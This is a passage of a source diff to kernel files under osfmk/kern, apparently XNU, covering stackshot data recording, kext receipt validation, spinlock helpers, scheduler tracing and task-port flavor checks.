LATENCY_QOS_TIER_UNSPECIFIED) ? 
@@ -1471,7 +1508,7 @@ kcdata_record_task_delta_snapshot(kcdata_descriptor_t kcd, task_t task, uint64_t cur_tsnap->tds_max_resident_size = get_task_resident_max(task); cur_tsnap->tds_suspend_count = task->suspend_count; - cur_tsnap->tds_faults = task->faults; + cur_tsnap->tds_faults = counter_load(&task->faults); cur_tsnap->tds_pageins = task->pageins; cur_tsnap->tds_cow_faults = task->cow_faults; cur_tsnap->tds_was_throttled = (uint32_t)proc_was_throttled_from_task(task); @@ -2348,6 +2385,9 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac if (trace_flags & STACKSHOT_PAGE_TABLES) { kcd_exit_on_error(kcdata_add_uint32_with_description(stackshot_kcdata_p, stack_snapshot_pagetable_mask, "stackshot_pagetable_mask")); } + if (stackshot_initial_estimate != 0) { + kcd_exit_on_error(kcdata_add_uint32_with_description(stackshot_kcdata_p, stackshot_initial_estimate, "stackshot_size_estimate")); + } #if STACKSHOT_COLLECTS_LATENCY_INFO latency_info.setup_latency = mach_absolute_time(); @@ -2383,28 +2423,41 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac kcd_exit_on_error(kcdata_push_data(stackshot_kcdata_p, KCDATA_TYPE_USECS_SINCE_EPOCH, sizeof(uint64_t), &stackshot_microsecs)); /* record system level shared cache load info (if available) */ - if (!collect_delta_stackshot && init_task_shared_region && - ml_validate_nofault((vm_offset_t)init_task_shared_region, sizeof(struct vm_shared_region))) { - struct dyld_uuid_info_64_v2 sys_shared_cache_info = {0}; + if (!collect_delta_stackshot && primary_system_shared_region && + ml_validate_nofault((vm_offset_t)primary_system_shared_region, sizeof(struct vm_shared_region))) { + struct dyld_shared_cache_loadinfo sys_shared_cache_info = {0}; - stackshot_memcpy(sys_shared_cache_info.imageUUID, &init_task_shared_region->sr_uuid, sizeof(init_task_shared_region->sr_uuid)); - sys_shared_cache_info.imageLoadAddress = - init_task_shared_region->sr_slide; - 
sys_shared_cache_info.imageSlidBaseAddress = - init_task_shared_region->sr_slide + init_task_shared_region->sr_base_address; + /* + * Historically, this data was in a dyld_uuid_info_64 structure, but the + * naming of both the structure and fields for this use isn't great. The + * dyld_shared_cache_loadinfo structure has better names, but the same + * layout and content as the original. + * + * The imageSlidBaseAddress/sharedCacheUnreliableSlidBaseAddress field + * has been used inconsistently for STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT + * entries; here, it's the slid base address, and we leave it that way + * for backwards compatibility. + */ + stackshot_memcpy(sys_shared_cache_info.sharedCacheUUID, &primary_system_shared_region->sr_uuid, sizeof(primary_system_shared_region->sr_uuid)); + sys_shared_cache_info.sharedCacheSlide = + primary_system_shared_region->sr_slide; + sys_shared_cache_info.sharedCacheUnreliableSlidBaseAddress = + primary_system_shared_region->sr_slide + primary_system_shared_region->sr_base_address; + sys_shared_cache_info.sharedCacheSlidFirstMapping = + primary_system_shared_region->sr_base_address + primary_system_shared_region->sr_first_mapping; kcd_exit_on_error(kcdata_push_data(stackshot_kcdata_p, STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO, - sizeof(struct dyld_uuid_info_64_v2), &sys_shared_cache_info)); + sizeof(sys_shared_cache_info), &sys_shared_cache_info)); if (trace_flags & STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT) { /* * Include a map of the system shared cache layout if it has been populated * (which is only when the system is using a custom shared cache). 
*/ - if (init_task_shared_region->sr_images && ml_validate_nofault((vm_offset_t)init_task_shared_region->sr_images, - (init_task_shared_region->sr_images_count * sizeof(struct dyld_uuid_info_64)))) { - assert(init_task_shared_region->sr_images_count != 0); - kcd_exit_on_error(kcdata_push_array(stackshot_kcdata_p, STACKSHOT_KCTYPE_SYS_SHAREDCACHE_LAYOUT, sizeof(struct dyld_uuid_info_64), init_task_shared_region->sr_images_count, init_task_shared_region->sr_images)); + if (primary_system_shared_region->sr_images && ml_validate_nofault((vm_offset_t)primary_system_shared_region->sr_images, + (primary_system_shared_region->sr_images_count * sizeof(struct dyld_uuid_info_64)))) { + assert(primary_system_shared_region->sr_images_count != 0); + kcd_exit_on_error(kcdata_push_array(stackshot_kcdata_p, STACKSHOT_KCTYPE_SYS_SHAREDCACHE_LAYOUT, sizeof(struct dyld_uuid_info_64), primary_system_shared_region->sr_images_count, primary_system_shared_region->sr_images)); } } } @@ -2502,7 +2555,7 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac if (!panic_stackshot && (trace_flags & STACKSHOT_SAVE_JETSAM_COALITIONS)) { coalition_begin_cpu_cycle_count = mt_cur_cpu_cycles(); } -#endif +#endif /* INTERRUPT_MASKED_DEBUG && MONOTONIC */ /* Iterate over coalitions */ if (trace_flags & STACKSHOT_SAVE_JETSAM_COALITIONS) { @@ -2530,7 +2583,7 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac kcd_exit_on_error(kcdata_add_uint64_with_description(stackshot_kcdata_p, (mt_cur_cpu_cycles() - coalition_begin_cpu_cycle_count), "coalitions_cpu_cycle_count")); } -#endif +#endif /* INTERRUPT_MASKED_DEBUG && MONOTONIC */ } #else trace_flags &= ~(STACKSHOT_SAVE_JETSAM_COALITIONS); @@ -2557,7 +2610,6 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac } } - #if STACKSHOT_COLLECTS_LATENCY_INFO latency_info.total_terminated_task_iteration_latency = mach_absolute_time() - 
latency_info.total_terminated_task_iteration_latency; #endif /* STACKSHOT_COLLECTS_LATENCY_INFO */ @@ -2576,22 +2628,22 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac /* update timestamp of the stackshot */ abs_time_end = mach_absolute_time(); -#if DEVELOPMENT || DEBUG - struct stackshot_duration stackshot_duration; - stackshot_duration.stackshot_duration = (abs_time_end - abs_time); - stackshot_duration.stackshot_duration_outer = 0; + struct stackshot_duration_v2 stackshot_duration = { + .stackshot_duration = (abs_time_end - abs_time), + .stackshot_duration_outer = 0, + .stackshot_duration_prior = stackshot_duration_prior_abs, + }; if ((trace_flags & STACKSHOT_DO_COMPRESS) == 0) { kcd_exit_on_error(kcdata_get_memory_addr(stackshot_kcdata_p, STACKSHOT_KCTYPE_STACKSHOT_DURATION, - sizeof(struct stackshot_duration), &out_addr)); - struct stackshot_duration *duration_p = (void *) out_addr; + sizeof(struct stackshot_duration_v2), &out_addr)); + struct stackshot_duration_v2 *duration_p = (void *) out_addr; stackshot_memcpy(duration_p, &stackshot_duration, sizeof(*duration_p)); stackshot_duration_outer = (unaligned_u64 *)&duration_p->stackshot_duration_outer; } else { kcd_exit_on_error(kcdata_push_data(stackshot_kcdata_p, STACKSHOT_KCTYPE_STACKSHOT_DURATION, sizeof(stackshot_duration), &stackshot_duration)); stackshot_duration_outer = NULL; } -#endif #if INTERRUPT_MASKED_DEBUG && MONOTONIC if (!panic_stackshot) { @@ -2610,15 +2662,20 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac *pBytesTraced = (uint32_t) kcdata_memory_get_used_bytes(stackshot_kcdata_p); *pBytesUncompressed = (uint32_t) kcdata_memory_get_uncompressed_bytes(stackshot_kcdata_p); -error_exit: +error_exit:; #if INTERRUPT_MASKED_DEBUG - if (trace_flags & STACKSHOT_DO_COMPRESS) { + bool disable_interrupts_masked_check = kern_feature_override( + KF_INTERRUPT_MASKED_DEBUG_STACKSHOT_OVRD) || + (trace_flags & STACKSHOT_DO_COMPRESS) != 0; + 
+#if STACKSHOT_INTERRUPTS_MASKED_CHECK_DISABLED + disable_interrupts_masked_check = true; +#endif /* STACKSHOT_INTERRUPTS_MASKED_CHECK_DISABLED */ + + if (disable_interrupts_masked_check) { ml_spin_debug_clear_self(); } -#if defined(STACKSHOT_INTERRUPTS_MASKED_CHECK_DISABLED) - ml_spin_debug_clear_self(); -#endif if (!panic_stackshot && interrupt_masked_debug) { /* @@ -2627,7 +2684,7 @@ error_exit: */ ml_check_stackshot_interrupt_disabled_duration(current_thread()); } -#endif +#endif /* INTERRUPT_MASKED_DEBUG */ stack_enable_faulting = FALSE; @@ -2668,10 +2725,8 @@ kdp_mem_and_io_snapshot(struct mem_and_io_snapshot *memio_snap) uint64_t compressions = 0; uint64_t decompressions = 0; - percpu_foreach(stat, vm_stat) { - compressions += stat->compressions; - decompressions += stat->decompressions; - } + compressions = counter_load(&vm_statistics_compressions); + decompressions = counter_load(&vm_statistics_decompressions); memio_snap->snapshot_magic = STACKSHOT_MEM_AND_IO_SNAPSHOT_MAGIC; memio_snap->free_pages = vm_page_free_count; @@ -3105,7 +3160,7 @@ stackshot_thread_group_snapshot(void *arg, int i, struct thread_group *tg) { struct thread_group_snapshot_v2 *thread_groups = (struct thread_group_snapshot_v2 *)arg; struct thread_group_snapshot_v2 *tgs = &thread_groups[i]; - uint64_t flags = kdp_thread_group_get_flags(tg); + uint32_t flags = thread_group_get_flags(tg); tgs->tgs_id = thread_group_get_id(tg); stackshot_memcpy(tgs->tgs_name, thread_group_get_name(tg), THREAD_GROUP_MAXNAME); tgs->tgs_flags = ((flags & THREAD_GROUP_FLAGS_EFFICIENT) ? 
kThreadGroupEfficient : 0) | diff --git a/osfmk/kern/kext_alloc.c b/osfmk/kern/kext_alloc.c index 5a689341f..2abe7d4d9 100644 --- a/osfmk/kern/kext_alloc.c +++ b/osfmk/kern/kext_alloc.c @@ -39,6 +39,7 @@ #include #include #include +#include #include #define KASLR_IOREG_DEBUG 0 @@ -246,23 +247,57 @@ kext_free(vm_offset_t addr, vm_size_t size) kern_return_t kext_receipt(void **addrp, size_t *sizep) { + kern_return_t ret = KERN_FAILURE; if (addrp == NULL || sizep == NULL) { - return KERN_FAILURE; + goto finish; } kernel_mach_header_t *kc = PE_get_kc_header(KCKindAuxiliary); if (kc == NULL) { - return KERN_FAILURE; + ret = KERN_MISSING_KC; + goto finish; + } + + /* + * This will be set in early boot once we've successfully checked that + * the AuxKC is properly linked against the BootKC. If this isn't set, + * and we have a valid AuxKC mach header, then the booter gave us a + * bad KC. + */ + if (auxkc_uuid_valid == FALSE) { + ret = KERN_INVALID_KC; + goto finish; } size_t size; void *addr = getsectdatafromheader(kc, kReceiptInfoSegment, kAuxKCReceiptSection, &size); if (addr == NULL) { - return KERN_FAILURE; + ret = KERN_INVALID_KC; + goto finish; } *addrp = addr; *sizep = size; - return KERN_SUCCESS; + ret = KERN_SUCCESS; + +finish: + /* + * If we do return success, we'll want to wait for the other side to + * call kext_receipt_set_queried themselves, so we can confirm that + * it made the roundtrip before allowing third party kexts to load. + */ + if (ret != KERN_SUCCESS) { + kext_receipt_set_queried(); + } + return ret; +} + +/* + * Returns KERN_FAILURE if the variable was already set. 
+ */ +kern_return_t +kext_receipt_set_queried() +{ + return OSKextSetReceiptQueried(); } diff --git a/osfmk/kern/kext_alloc.h b/osfmk/kern/kext_alloc.h index a629bec2e..70d34ff9e 100644 --- a/osfmk/kern/kext_alloc.h +++ b/osfmk/kern/kext_alloc.h @@ -43,6 +43,8 @@ void kext_free(vm_offset_t addr, vm_size_t size); kern_return_t kext_receipt(void **addrp, size_t *sizep); +kern_return_t kext_receipt_set_queried(void); + __END_DECLS #endif /* _KEXT_ALLOC_H_ */ diff --git a/osfmk/kern/lock_stat.h b/osfmk/kern/lock_stat.h index 0214122e5..ae29df20d 100644 --- a/osfmk/kern/lock_stat.h +++ b/osfmk/kern/lock_stat.h @@ -121,18 +121,18 @@ enum lockstat_probe_id { #if CONFIG_DTRACE extern uint32_t lockstat_probemap[LS_NPROBES]; -extern void (*lockstat_probe)(uint32_t, uint64_t, uint64_t, +extern void dtrace_probe(uint32_t, uint64_t, uint64_t, uint64_t, uint64_t, uint64_t); /* * Macros to record lockstat probes. */ #define LOCKSTAT_RECORD4(probe, lp, arg0, arg1, arg2, arg3) \ - { \ - uint32_t id; \ - if (__improbable(id = lockstat_probemap[(probe)])) { \ - (*lockstat_probe)(id, (uintptr_t)(lp), (arg0), \ - (arg1), (arg2), (arg3)); \ - } \ + { \ + uint32_t id; \ + if (__improbable(id = lockstat_probemap[(probe)])) { \ + dtrace_probe(id, (uintptr_t)(lp), (arg0), \ + (arg1), (arg2), (arg3)); \ + } \ } #define LOCKSTAT_RECORD_(probe, lp, arg0, arg1, arg2, arg3, ...) LOCKSTAT_RECORD4(probe, lp, arg0, arg1, arg2, arg3) #define LOCKSTAT_RECORD__(probe, lp, arg0, arg1, arg2, arg3, ...) LOCKSTAT_RECORD_(probe, lp, arg0, arg1, arg2, arg3) diff --git a/osfmk/kern/locks.c b/osfmk/kern/locks.c index aa28feb62..9e626c3de 100644 --- a/osfmk/kern/locks.c +++ b/osfmk/kern/locks.c @@ -497,7 +497,7 @@ lck_attr_free( * * Initialize a hardware lock. 
*/ -void +MARK_AS_HIBERNATE_TEXT void hw_lock_init(hw_lock_t lock) { ordered_store_hw(lock, 0); @@ -672,23 +672,13 @@ void hw_lock_lock_internal(lock, thread LCK_GRP_ARG(grp)); } -/* - * Routine: hw_lock_to - * - * Acquire lock, spinning until it becomes available or timeout. - * Timeout is in mach_absolute_time ticks, return with - * preemption disabled. - */ -unsigned -int -(hw_lock_to)(hw_lock_t lock, uint64_t timeout LCK_GRP_ARG(lck_grp_t *grp)) +static inline unsigned int +hw_lock_to_internal(hw_lock_t lock, uint64_t timeout, thread_t thread + LCK_GRP_ARG(lck_grp_t *grp)) { - thread_t thread; - uintptr_t state; + uintptr_t state; unsigned int success = 0; - thread = current_thread(); - disable_preemption_for_thread(thread); state = LCK_MTX_THREAD_TO_STATE(thread) | PLATFORM_LCK_ILOCK; #if LOCK_PRETEST if (ordered_load_hw(lock)) { @@ -710,6 +700,40 @@ end: return success; } +/* + * Routine: hw_lock_to + * + * Acquire lock, spinning until it becomes available or timeout. + * Timeout is in mach_absolute_time ticks, return with + * preemption disabled. + */ +unsigned +int +(hw_lock_to)(hw_lock_t lock, uint64_t timeout LCK_GRP_ARG(lck_grp_t *grp)) +{ + thread_t thread = current_thread(); + disable_preemption_for_thread(thread); + return hw_lock_to_internal(lock, timeout, thread LCK_GRP_ARG(grp)); +} + +/* + * Routine: hw_lock_to_nopreempt + * + * Acquire lock, spinning until it becomes available or timeout. + * Timeout is in mach_absolute_time ticks, called and return with + * preemption disabled. 
+ */ +unsigned +int +(hw_lock_to_nopreempt)(hw_lock_t lock, uint64_t timeout LCK_GRP_ARG(lck_grp_t *grp)) +{ + thread_t thread = current_thread(); + if (__improbable(!preemption_disabled_for_thread(thread))) { + panic("Attempt to test no-preempt spinlock %p in preemptible context", lock); + } + return hw_lock_to_internal(lock, timeout, thread LCK_GRP_ARG(grp)); +} + /* * Routine: hw_lock_try * diff --git a/osfmk/kern/machine.c b/osfmk/kern/machine.c index 248790205..03f9287d4 100644 --- a/osfmk/kern/machine.c +++ b/osfmk/kern/machine.c @@ -75,7 +75,6 @@ #include #include -#include #include #include #include @@ -175,8 +174,6 @@ host_reboot( return KERN_INVALID_HOST; } - assert(host_priv == &realhost); - #if DEVELOPMENT || DEBUG if (options & HOST_REBOOT_DEBUGGER) { Debugger("Debugger"); @@ -466,8 +463,6 @@ host_get_boot_info( return KERN_INVALID_HOST; } - assert(host_priv == &realhost); - /* * Copy first operator string terminated by '\0' followed by * standardized strings generated from boot string. 
diff --git a/osfmk/kern/policy_internal.h b/osfmk/kern/policy_internal.h index fc1b4b6f4..f0a7f3535 100644 --- a/osfmk/kern/policy_internal.h +++ b/osfmk/kern/policy_internal.h @@ -158,6 +158,9 @@ extern void proc_inherit_task_role(task_t new_task, task_t old_task); #if CONFIG_IOSCHED #define IOSCHED_METADATA_TIER THROTTLE_LEVEL_TIER1 +#define IOSCHED_METADATA_EXPEDITED_TIER THROTTLE_LEVEL_TIER0 +_Static_assert(IOSCHED_METADATA_EXPEDITED_TIER < IOSCHED_METADATA_TIER, + "expedited metadata tier must be less than metadata tier"); #endif /* CONFIG_IOSCHED */ extern int proc_get_darwinbgstate(task_t task, uint32_t *flagsp); diff --git a/osfmk/kern/printf.c b/osfmk/kern/printf.c index 898086d8e..8acbbc8d4 100644 --- a/osfmk/kern/printf.c +++ b/osfmk/kern/printf.c @@ -365,7 +365,7 @@ __doprnt( if (c == 'z' || c == 'Z') { c = *++fmt; - if (sizeof(size_t) == sizeof(unsigned long)) { + if (sizeof(size_t) == sizeof(unsigned long long)) { long_long = 1; } } diff --git a/osfmk/kern/processor.c b/osfmk/kern/processor.c index 3cffb3fed..01aa936af 100644 --- a/osfmk/kern/processor.c +++ b/osfmk/kern/processor.c @@ -108,7 +108,9 @@ queue_head_t corpse_tasks; int tasks_count; int terminated_tasks_count; queue_head_t threads; +queue_head_t terminated_threads; int threads_count; +int terminated_threads_count; LCK_GRP_DECLARE(task_lck_grp, "task"); LCK_ATTR_DECLARE(task_lck_attr, 0, 0); LCK_MTX_DECLARE_ATTR(tasks_threads_lock, &task_lck_grp, &task_lck_attr); @@ -179,6 +181,7 @@ processor_bootstrap(void) queue_init(&tasks); queue_init(&terminated_tasks); queue_init(&threads); + queue_init(&terminated_threads); queue_init(&corpse_tasks); processor_init(master_processor, master_cpu, &pset0); @@ -1212,7 +1215,8 @@ processor_set_things( processor_set_t pset, void **thing_list, mach_msg_type_number_t *count, - int type) + int type, + mach_task_flavor_t flavor) { unsigned int i; task_t task; @@ -1344,7 +1348,7 @@ processor_set_things( /* for each task, make sure we are allowed to examine it 
*/ for (i = used = 0; i < actual_tasks; i++) { - if (mac_task_check_expose_task(task_list[i])) { + if (mac_task_check_expose_task(task_list[i], flavor)) { task_deallocate(task_list[i]); continue; } @@ -1455,12 +1459,12 @@ processor_set_tasks_internal( processor_set_t pset, task_array_t *task_list, mach_msg_type_number_t *count, - int flavor) + mach_task_flavor_t flavor) { kern_return_t ret; mach_msg_type_number_t i; - ret = processor_set_things(pset, (void **)task_list, count, PSET_THING_TASK); + ret = processor_set_things(pset, (void **)task_list, count, PSET_THING_TASK, flavor); if (ret != KERN_SUCCESS) { return ret; } @@ -1469,7 +1473,12 @@ processor_set_tasks_internal( switch (flavor) { case TASK_FLAVOR_CONTROL: for (i = 0; i < *count; i++) { - (*task_list)[i] = (task_t)convert_task_to_port((*task_list)[i]); + if ((*task_list)[i] == current_task()) { + /* if current_task(), return pinned port */ + (*task_list)[i] = (task_t)convert_task_to_port_pinned((*task_list)[i]); + } else { + (*task_list)[i] = (task_t)convert_task_to_port((*task_list)[i]); + } } break; case TASK_FLAVOR_READ: @@ -1559,7 +1568,7 @@ processor_set_threads( kern_return_t ret; mach_msg_type_number_t i; - ret = processor_set_things(pset, (void **)thread_list, count, PSET_THING_THREAD); + ret = processor_set_things(pset, (void **)thread_list, count, PSET_THING_THREAD, TASK_FLAVOR_CONTROL); if (ret != KERN_SUCCESS) { return ret; } diff --git a/osfmk/kern/processor.h b/osfmk/kern/processor.h index eb2246cbd..16927ab17 100644 --- a/osfmk/kern/processor.h +++ b/osfmk/kern/processor.h @@ -291,7 +291,7 @@ struct pset_node { extern struct pset_node pset_node0; extern queue_head_t tasks, threads, corpse_tasks; -extern int tasks_count, terminated_tasks_count, threads_count; +extern int tasks_count, terminated_tasks_count, threads_count, terminated_threads_count; decl_lck_mtx_data(extern, tasks_threads_lock); decl_lck_mtx_data(extern, tasks_corpse_lock); @@ -300,6 +300,8 @@ decl_lck_mtx_data(extern, 
tasks_corpse_lock); */ extern queue_head_t terminated_tasks; +extern queue_head_t terminated_threads; + struct processor { processor_state_t state; /* See above */ bool is_SMT; diff --git a/osfmk/kern/sched_amp.c b/osfmk/kern/sched_amp.c index 2f06bca90..a757f709f 100644 --- a/osfmk/kern/sched_amp.c +++ b/osfmk/kern/sched_amp.c @@ -670,40 +670,6 @@ sched_amp_thread_group_recommendation_change(struct thread_group *tg, cluster_ty } #if DEVELOPMENT || DEBUG -extern int32_t sysctl_get_bound_cpuid(void); -int32_t -sysctl_get_bound_cpuid(void) -{ - int32_t cpuid = -1; - thread_t self = current_thread(); - - processor_t processor = self->bound_processor; - if (processor == NULL) { - cpuid = -1; - } else { - cpuid = processor->cpu_id; - } - - return cpuid; -} - -extern void sysctl_thread_bind_cpuid(int32_t cpuid); -void -sysctl_thread_bind_cpuid(int32_t cpuid) -{ - if (cpuid < 0 || cpuid >= MAX_SCHED_CPUS) { - return; - } - - processor_t processor = processor_array[cpuid]; - if (processor == PROCESSOR_NULL) { - return; - } - - thread_bind(processor); - - thread_block(THREAD_CONTINUE_NULL); -} extern char sysctl_get_bound_cluster_type(void); char @@ -765,6 +731,6 @@ sysctl_task_set_cluster_type(char cluster_type) thread_block(THREAD_CONTINUE_NULL); } -#endif +#endif /* DEVELOPMENT || DEBUG */ -#endif +#endif /* __AMP__ */ diff --git a/osfmk/kern/sched_average.c b/osfmk/kern/sched_average.c index f74e8b960..f2bd777ff 100644 --- a/osfmk/kern/sched_average.c +++ b/osfmk/kern/sched_average.c @@ -71,6 +71,7 @@ #if CONFIG_TELEMETRY #include #endif +#include #include @@ -112,6 +113,7 @@ static struct sched_average { { compute_stack_target, NULL, 5, 1 }, { compute_pageout_gc_throttle, NULL, 1, 0 }, { compute_pmap_gc_throttle, NULL, 60, 0 }, + { compute_zone_working_set_size, NULL, ZONE_WSS_UPDATE_PERIOD, 0 }, #if CONFIG_TELEMETRY { compute_telemetry, NULL, 1, 0 }, #endif diff --git a/osfmk/kern/sched_prim.c b/osfmk/kern/sched_prim.c index 640754947..adcec01c6 100644 --- 
a/osfmk/kern/sched_prim.c +++ b/osfmk/kern/sched_prim.c @@ -83,7 +83,6 @@ #include #include #include -#include #include #include #include @@ -687,6 +686,8 @@ thread_unblock( ctime = mach_absolute_time(); thread->realtime.deadline = thread->realtime.constraint + ctime; + KDBG(MACHDBG_CODE(DBG_MACH_SCHED, MACH_SET_RT_DEADLINE) | DBG_FUNC_NONE, + (uintptr_t)thread_tid(thread), thread->realtime.deadline, thread->realtime.computation, 0); } /* @@ -2098,6 +2099,10 @@ restart: } } + bool secondary_forced_idle = ((processor->processor_secondary != PROCESSOR_NULL) && + (thread_no_smt(thread) || (thread->sched_pri >= BASEPRI_RTQUEUES)) && + (processor->processor_secondary->state == PROCESSOR_IDLE)); + /* OK, so we're not going to run the current thread. Look at the RT queue. */ bool ok_to_run_realtime_thread = sched_ok_to_run_realtime_thread(pset, processor); if ((rt_runq_count(pset) > 0) && ok_to_run_realtime_thread) { @@ -2174,6 +2179,10 @@ pick_new_rt_thread: ipi_type = sched_ipi_action(sprocessor, NULL, false, SCHED_IPI_EVENT_SMT_REBAL); ast_processor = sprocessor; } + } else if (secondary_forced_idle && !thread_no_smt(new_thread) && pset_has_stealable_threads(pset)) { + pset_update_processor_state(pset, sprocessor, PROCESSOR_DISPATCHING); + ipi_type = sched_ipi_action(sprocessor, NULL, true, SCHED_IPI_EVENT_PREEMPT); + ast_processor = sprocessor; } pset_unlock(pset); @@ -2428,8 +2437,6 @@ thread_invoke( thread->continuation = thread->parameter = NULL; - counter(c_thread_invoke_hits++); - boolean_t enable_interrupts = TRUE; /* idle thread needs to stay interrupts-disabled */ @@ -2444,7 +2451,6 @@ thread_invoke( } else if (thread == self) { /* same thread but with continuation */ ast_context(self); - counter(++c_thread_invoke_same); thread_unlock(self); @@ -2484,14 +2490,12 @@ thread_invoke( if (!thread->kernel_stack) { need_stack: if (!stack_alloc_try(thread)) { - counter(c_thread_invoke_misses++); thread_unlock(thread); thread_stack_enqueue(thread); return FALSE; } } 
else if (thread == self) { ast_context(self); - counter(++c_thread_invoke_same); thread_unlock(self); KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE, @@ -2521,8 +2525,6 @@ need_stack: thread_unlock(thread); - counter(c_thread_invoke_csw++); - self->reason = reason; processor->last_dispatch = ctime; @@ -2845,6 +2847,8 @@ thread_dispatch( * consumed the entire quantum. */ if (thread->quantum_remaining == 0) { + KDBG(MACHDBG_CODE(DBG_MACH_SCHED, MACH_CANCEL_RT_DEADLINE) | DBG_FUNC_NONE, + (uintptr_t)thread_tid(thread), thread->realtime.deadline, thread->realtime.computation, 0); thread->realtime.deadline = UINT64_MAX; } } else { @@ -3103,8 +3107,6 @@ thread_dispatch( * thread resumes, it will execute the continuation function * on a new kernel stack. */ -counter(mach_counter_t c_thread_block_calls = 0; ) - wait_result_t thread_block_reason( thread_continue_t continuation, @@ -3116,8 +3118,6 @@ thread_block_reason( thread_t new_thread; spl_t s; - counter(++c_thread_block_calls); - s = splsched(); processor = current_processor(); @@ -6921,3 +6921,61 @@ thread_bind_cluster_type(thread_t thread, char cluster_type, bool soft_bound) (void)soft_bound; #endif /* __AMP__ */ } + +#if DEVELOPMENT || DEBUG +extern int32_t sysctl_get_bound_cpuid(void); +int32_t +sysctl_get_bound_cpuid(void) +{ + int32_t cpuid = -1; + thread_t self = current_thread(); + + processor_t processor = self->bound_processor; + if (processor == NULL) { + cpuid = -1; + } else { + cpuid = processor->cpu_id; + } + + return cpuid; +} + +extern kern_return_t sysctl_thread_bind_cpuid(int32_t cpuid); +kern_return_t +sysctl_thread_bind_cpuid(int32_t cpuid) +{ + processor_t processor = PROCESSOR_NULL; + + if (cpuid == -1) { + goto unbind; + } + + if (cpuid < 0 || cpuid >= MAX_SCHED_CPUS) { + return KERN_INVALID_VALUE; + } + + processor = processor_array[cpuid]; + if (processor == PROCESSOR_NULL) { + return KERN_INVALID_VALUE; + } + +#if __AMP__ + + thread_t thread = current_thread(); + + if (thread->sched_flags & 
(TH_SFLAG_ECORE_ONLY | TH_SFLAG_PCORE_ONLY)) { + if ((thread->sched_flags & TH_SFLAG_BOUND_SOFT) == 0) { + /* Cannot hard-bind an already hard-cluster-bound thread */ + return KERN_NOT_SUPPORTED; + } + } + +#endif /* __AMP__ */ + +unbind: + thread_bind(processor); + + thread_block(THREAD_CONTINUE_NULL); + return KERN_SUCCESS; +} +#endif /* DEVELOPMENT || DEBUG */ diff --git a/osfmk/kern/simple_lock.h b/osfmk/kern/simple_lock.h index 67eb28971..7d08bea4b 100644 --- a/osfmk/kern/simple_lock.h +++ b/osfmk/kern/simple_lock.h @@ -76,10 +76,18 @@ #include #include -#ifdef MACH_KERNEL_PRIVATE +#ifdef XNU_KERNEL_PRIVATE + +#if MACH_KERNEL_PRIVATE #include #include +#endif + +__BEGIN_DECLS + +#pragma GCC visibility push(hidden) +#ifdef MACH_KERNEL_PRIVATE extern void hw_lock_init( hw_lock_t); @@ -97,6 +105,11 @@ extern unsigned int hw_lock_to( uint64_t, lck_grp_t*); +extern unsigned int hw_lock_to_nopreempt( + hw_lock_t, + uint64_t, + lck_grp_t*); + extern unsigned int hw_lock_try( hw_lock_t, lck_grp_t*); @@ -109,27 +122,36 @@ extern unsigned int hw_lock_try_nopreempt( extern void hw_lock_lock( hw_lock_t); - -#define hw_lock_lock(lck, grp) hw_lock_lock(lck) +#define hw_lock_lock(lck, grp) \ + hw_lock_lock(lck) extern void hw_lock_lock_nopreempt( hw_lock_t); -#define hw_lock_lock_nopreempt(lck, grp) hw_lock_lock_nopreempt(lck) +#define hw_lock_lock_nopreempt(lck, grp) \ + hw_lock_lock_nopreempt(lck) extern unsigned int hw_lock_to( hw_lock_t, uint64_t); -#define hw_lock_to(lck, timeout, grp) hw_lock_to(lck, timeout) +#define hw_lock_to(lck, timeout, grp) \ + hw_lock_to(lck, timeout) + +extern unsigned int hw_lock_to_nopreempt( + hw_lock_t, + uint64_t); +#define hw_lock_to_nopreempt(lck, timeout, grp) \ + hw_lock_to_nopreempt(lck, timeout) extern unsigned int hw_lock_try( hw_lock_t); -#define hw_lock_try(lck, grp) hw_lock_try(lck) +#define hw_lock_try(lck, grp) \ + hw_lock_try(lck) extern unsigned int hw_lock_try_nopreempt( hw_lock_t); -#define hw_lock_try_nopreempt(lck, grp) 
hw_lock_try_nopreempt(lck) - +#define hw_lock_try_nopreempt(lck, grp) \ + hw_lock_try_nopreempt(lck) #endif /* LOCK_STATS */ @@ -149,8 +171,10 @@ extern boolean_t hw_atomic_test_and_set32( enum memory_order ord, boolean_t wait); +extern void usimple_unlock_nopreempt( + usimple_lock_t); + #endif /* MACH_KERNEL_PRIVATE */ -#if XNU_KERNEL_PRIVATE struct usimple_lock_startup_spec { usimple_lock_t lck; @@ -167,10 +191,6 @@ extern void usimple_lock_startup_init( STARTUP_ARG(LOCKS_EARLY, STARTUP_RANK_FOURTH, usimple_lock_startup_init, \ &__startup_usimple_lock_spec_ ## var) -#endif /* XNU_KERNEL_PRIVATE */ - -__BEGIN_DECLS - extern void * hw_wait_while_equals( void **address, void *current); @@ -203,32 +223,35 @@ extern unsigned int usimple_lock_try_lock_mp_signal_safe_loop_duration( uint64_t, lck_grp_t*); #endif - #else extern void usimple_lock( usimple_lock_t); -#define usimple_lock(lck, grp) usimple_lock(lck) +#define usimple_lock(lck, grp) \ + usimple_lock(lck) extern unsigned int usimple_lock_try( usimple_lock_t); - -#define usimple_lock_try(lck, grp) usimple_lock_try(lck) +#define usimple_lock_try(lck, grp) \ + usimple_lock_try(lck) extern void usimple_lock_try_lock_loop( usimple_lock_t); -#define usimple_lock_try_lock_loop(lck, grp) usimple_lock_try_lock_loop(lck) +#define usimple_lock_try_lock_loop(lck, grp) \ + usimple_lock_try_lock_loop(lck) #if defined(__x86_64__) extern unsigned int usimple_lock_try_lock_mp_signal_safe_loop_deadline( usimple_lock_t, uint64_t); -#define usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl, grp) usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl) +#define usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl, 